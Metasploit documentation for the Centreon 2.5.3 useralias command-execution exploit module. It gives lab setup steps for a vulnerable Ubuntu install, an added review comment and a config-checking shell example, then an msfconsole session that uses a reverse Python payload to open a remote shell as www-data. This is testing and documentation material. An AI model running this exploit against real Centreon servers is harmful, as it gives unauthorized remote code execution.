
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/http/centreon_useralias_exec.md

Vulnerable Application

  1. Exploit-db

  2. Archived Copy: github

Creating A Testing Environment

Creating a testing environment for this application contained many steps, so I figured I would document the process here.

  1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was centreon

  2. Install php5.6 askubuntu

    sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
    sudo add-apt-repository ppa:ondrej/php
    sudo apt-get install php5.6
    sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
    sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
    sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
        select OK
        select No Configuration
    sudo apt-get install snmp-mibs-downloader

  3. Enable php5.6 in Apache with a2enmod, disable php7.0 with a2dismod

    a2enmod php5.6
    a2dismod php7.0

  4. Restart apache with sudo apache2ctl restart

  5. Install Nagios Plugins starting at step 6. The plugins link is broken, utilize nagios-plugins-2.1.1.tar.gz instead

    wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
    tar xvf nagios-plugins-2.1.1.tar.gz
    cd nagios-plugins-2.1.1/
    ./configure
    make
    sudo make install

5.1 If make fails with an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235), apply this patch:

--- plugins/sslutils.c.orig 2016-01-14 20:02:06.419867000 +0100 +++ plugins/sslutils.c 2016-01-14 20:01:36.091492000 +0100 @@ -70,8 +70,13 @@ #endif break; case 3: /* SSLv3 protocol */ +#if defined(OPENSSL_NO_SSL3) + printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library."))); + return STATE_CRITICAL; +#else method = SSLv3_client_method(); ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1; +#endif break; default: /* Unsupported */ printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));
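
Review bot: in the added `#if defined(OPENSSL_NO_SSL3)` branch, the call `printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));` has a doubled parenthesis, so its single argument is a comma expression: the `"%s\n"` is discarded and the translated message itself is passed as the format string, with no trailing newline. Drop the extra pair of parentheses so the call has the same shape as the existing `printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));` in the default case.
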
  6. Install Centreon clib

    cd ~
    git clone https://github.com/centreon/centreon-clib
    cd centreon-clib/build
    cmake .
    make
    sudo make install

  7. Install Centreon Broker

    cd ~
    git clone https://github.com/centreon/centreon-broker
    cd centreon-broker/build/
    cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
    make
    sudo make install

  8. Install Centreon Engine

    cd ~
    git clone https://github.com/centreon/centreon-engine
    cd centreon-engine/build/
    cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
    make
    sudo make install

  9. Now install Centreon Web but only the command line portion.

    sudo mkdir /var/log/centreon-engine
    cd ~
    sudo pear install XML_RPC-1.4.5    # may need to install php-xml
    wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
    tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
    cd centreon-2.5.3
    sudo ./install.sh -i
        <enter>
        q
        y
        y
        y
        y
        y
        <enter>
        y
        <enter>
        y
        <enter>
        y
        <enter>
        y
        <enter>
        y
        <enter>
        <enter>
        <enter>
        centreon
        <enter>
        /var/log/centreon-engine
        /home/centreon/nagios-plugins-2.1.1/plugins
        <enter>
        /etc/init.d/centengine
        /usr/local/bin/centengine
        /usr/local/etc/
        /usr/local/etc/
        /etc/init.d/centengine
        <enter>
        y
        y
        y
        <enter>
        y
        <enter>
        <enter>
        y
        y
        <enter>
        y
        y
        <enter>
        y
        <enter>
        <enter>
        y
        y

  10. Fix apache config

    sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
    sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
    sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
    sudo a2enconf centreon
    sudo service apache2 reload

  11. Configure via website. Browse to [removed]/centreon

    next
    next
    select centreon-engine
    /usr/local/lib/centreon-engine
    /usr/local/bin/centenginestats
    /usr/local/lib/centreon-engine
    /usr/local/lib/centreon-engine
    /usr/local/lib/centreon-engine
    next
    select centreon-broker
    /usr/local/lib/centreon-broker
    /usr/local/lib/cbmod.so
    /usr/local/lib/centreon-broker
    /usr/local/lib/centreon-broker
    /usr/local/lib/centreon-broker
    next
    Pick whatever details about your user you want, next
    Fill in mysql Root password, next
    next
    next
    next
    finish
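
The two sed substitutions in the "Fix apache config" step only match the exact strings `Order allow,deny` and `allow from all`. The following is an added example, not part of the module documentation, that applies the same substitutions to a copy of a config and counts any Apache 2.2-style access directives that survive. The function names, the sample config and its paths are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the module documentation). Function names and the
# sample config below are constructed for illustration.

# Write a constructed Apache 2.2-style config fragment to $1.
make_sample_conf() {
    cat > "$1" <<'EOF'
Alias /centreon /usr/local/centreon/www/
<Directory "/usr/local/centreon/www">
    AllowOverride AuthConfig Options
    Order allow,deny
    allow from all
</Directory>
EOF
}

# Apply the two sed expressions from the "Fix apache config" step to $1,
# writing the result to $2 instead of editing in place.
migrate_access_directives() {
    sed -e 's/Order allow,deny/Require all granted/' \
        -e 's/allow from all//' "$1" > "$2"
}

# Print how many lines of $1 still use 2.2-style Order / Allow from / Deny from.
# grep -c exits 1 on zero matches, hence the "|| true".
count_legacy_directives() {
    grep -Eic '^[[:space:]]*(order[[:space:]]|(allow|deny)[[:space:]]+from)' "$1" || true
}

# Demo on the constructed sample.
demo_dir=$(mktemp -d)
make_sample_conf "$demo_dir/centreon.conf"
migrate_access_directives "$demo_dir/centreon.conf" "$demo_dir/centreon.migrated.conf"
echo "legacy directives before: $(count_legacy_directives "$demo_dir/centreon.conf")"
echo "legacy directives after:  $(count_legacy_directives "$demo_dir/centreon.migrated.conf")"
rm -rf "$demo_dir"
```

A non-zero count after migration means the file contains access directives in a different form (for example `Order deny,allow` with `Deny from all`) that the two substitutions leave untouched.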

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/linux/http/centreon_useralias_exec

  4. Do: set payload

  5. Do: set rhost

  6. Do: check

  7. Do: run

  8. You should get a shell.

Scenarios

Just a standard run.

    msf > use exploit/linux/http/centreon_useralias_exec
    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
    payload => cmd/unix/reverse_python
    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
    rhost => 192.168.2.85
    msf exploit(centreon_useralias_exec) > set verbose true
    verbose => true
    msf exploit(centreon_useralias_exec) > check
    [+] Version Detected: 2.5.3
    [*] 192.168.2.85:80 The target appears to be vulnerable.
    msf exploit(centreon_useralias_exec) > exploit
    [*] Started reverse TCP handler on 192.168.2.229:4444
    [*] Sending malicious login
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
    whoami
    www-data
    uname -a
    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux